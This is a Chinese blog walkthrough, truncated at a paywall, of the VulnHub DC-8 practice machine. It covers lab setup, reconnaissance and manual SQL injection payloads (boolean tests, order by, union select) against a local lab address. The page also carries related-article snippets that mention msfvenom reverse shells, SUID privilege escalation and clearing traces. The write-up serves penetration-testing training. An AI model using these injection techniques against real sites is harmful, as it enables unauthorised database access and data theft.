靶机DC-8(详细渗透,适合新手渗透)

最新推荐文章于 2024-03-24 18:58:40 发布
置顶 最新推荐文章于 2024-03-24 18:58:40 发布
阅读量1.3w 收藏 61
点赞数 17
分类专栏: 靶机渗透 文章标签: 靶机 渗透测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45744814/article/details/120113301
版权

目录

靶机DC-8 (详细渗透,适合新手渗透)

0x01靶机描述

靶机信息

链接 https://www.vulnhub.com/entry/dc-8,367/
发布日期 2019年9月4日
作者 DCAU
难度 简单

0x02环境搭建

1. 下载并导入靶机

打开vmware-文件-打开-DC-8.ova

在这里插入图片描述在这里插入图片描述

2. 查看网络适配器

将靶机网络适配器改为NAT模式
在这里插入图片描述

3. 启动靶机

点击 ▶靶机,开启成功
在这里插入图片描述

0x03靶机渗透

一、 信息收集

1. 主机发现

在这里插入图片描述
在这里插入图片描述

2. 端口扫描

在这里插入图片描述

3. 详细扫描

在这里插入图片描述

4. 目录扫描

在这里插入图片描述

5. gobuster目录扫描

为了避免漏扫,gobuster再进行目录扫描

在这里插入图片描述

6. 网站指纹识别

在这里插入图片描述

二、 漏洞挖掘

手工sql注入
1. 通过手工验证,此处url含有sql注入漏洞

http://192.168.30.206/?nid=2 and 1=1 --+
请添加图片描述

http://192.168.30.206/?nid=2 and 1=2 --+
请添加图片描述

2. 判断字段数

http://192.168.30.206/?nid=2 order by 1 --+
请添加图片描述

http://192.168.30.206/?nid=2 order by 2 --+
请添加图片描述

所以可以看出字段数为1

3. 判断显示位置

http://192.168.30.206/?nid=-2 union select 1 --+
请添加图片描述

4. 查看当前数据库

请添加图片描述

5. 查找库d7db中所有的表

http://192.168.30.206/?nid=-2 union select group_conc

最低0.47元/天 解锁文章
君莫hacker
关注
  • 17
    点赞
  • 61
    收藏
    觉得还不错? 一键收藏
  • 25
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-8靶机渗透测试
来日可期的博客
08-13 1719
综上所述,该命令使用 msfvenom 工具生成一个 PHP Meterpreter 反向 TCP Shell 的 payload。该 payload 将在攻击者指定的 IP 地址和端口上监听,并允许攻击者对受感染的系统进行远程控制。这个命令是使用 Metasploit Framework 中的 msfvenom 工具生成一个 PHP Meterpreter 反向 TCP Shell 的 payload,并将生成的代码保存到。在搜索页面的时候发现,页面中有一个可以上传php代码的地方。
DC8靶场渗透流程(超详细)
m0_64583632的博客
04-12 636
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
靶机9 DC-8(过程超详细
honest_gg的博客
09-26 2181
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
DC-8靶机渗透
m0_62008601的博客
06-05 1035
dc-8靶机详细渗透过程
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
DC-4-Web渗透测试靶机
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
DC靶机系列:DC-8
Ays.Ie的博客
02-28 277
本篇文章为DC系列第8个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
看完这篇 教你玩转渗透测试靶机vulnhub——DC8
Aluxian_的博客
04-07 2189
Vulnhub靶机DC8渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC8 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.c
Neos的渗透测试靶机练习——DC-8
qq_38678845的博客
01-14 1011
一次渗透测试练习
DC8靶机渗透测试(个人学习记录)
最新发布
m0_53806046的博客
03-24 1115
SUID位允许用户以文件所有者的身份执行文件,而不是以用户自己的权限执行。当一个文件设置了SUID位(4000)时,这意味着当用户执行该文件时,他们将以该文件的所有者身份执行,而不是以他们自己的用户身份执行。2>/dev/null:这部分是将标准错误(stderr)重定向到 /dev/null,这意味着任何错误消息(例如,无法访问的目录或文件)都会被忽略,不会显示在命令输出中。它是最常用的密码测试和破解程序之一,因为它将多个密码破解程序合并到一个软件包中,可以自动检测密码哈希类型,并包含可定制的破解器。
vulnhub DC-8靶机实战
m0_51195235的博客
12-01 532
vulnhub DC-8靶机实战
DC: 8靶机-Walkthrough
ins1ght的博客
09-26 773
DC: 8靶机,不知道是不是这个系列的最后一个靶机,后面会把DC:1~6的Walkthrough都放出来,啥时候不确定,但一定有。靶机做了一些之后就发现“信息收集是王道,注意细节是魔鬼”,尤其这个靶机,真的是细节是魔鬼????。enjoy
vulnhub之DC8靶机
LainWith的博客
02-15 2946
目录介绍信息收集主机发现主机信息探测访问网站目录扫描漏洞发现手工SQL联合查询注入1. 判断列数,得知是1列2. 数据查询&信息收集(union select)3. 获取数据库的表名4. 查询指定表名下的列名信息5. 查询指定列获取数据6. 爆破密码反弹shell提权exim4提权拿到Flag 介绍 系列: DC(此系列共10台) 发布日期:2019年9月8日 难度:中级 Flag:此挑战的最终目标是绕过双因素身份验证,获取root权限并读取唯一的Flag 学习: sql注入 网站挂马 exim4
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论 25
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值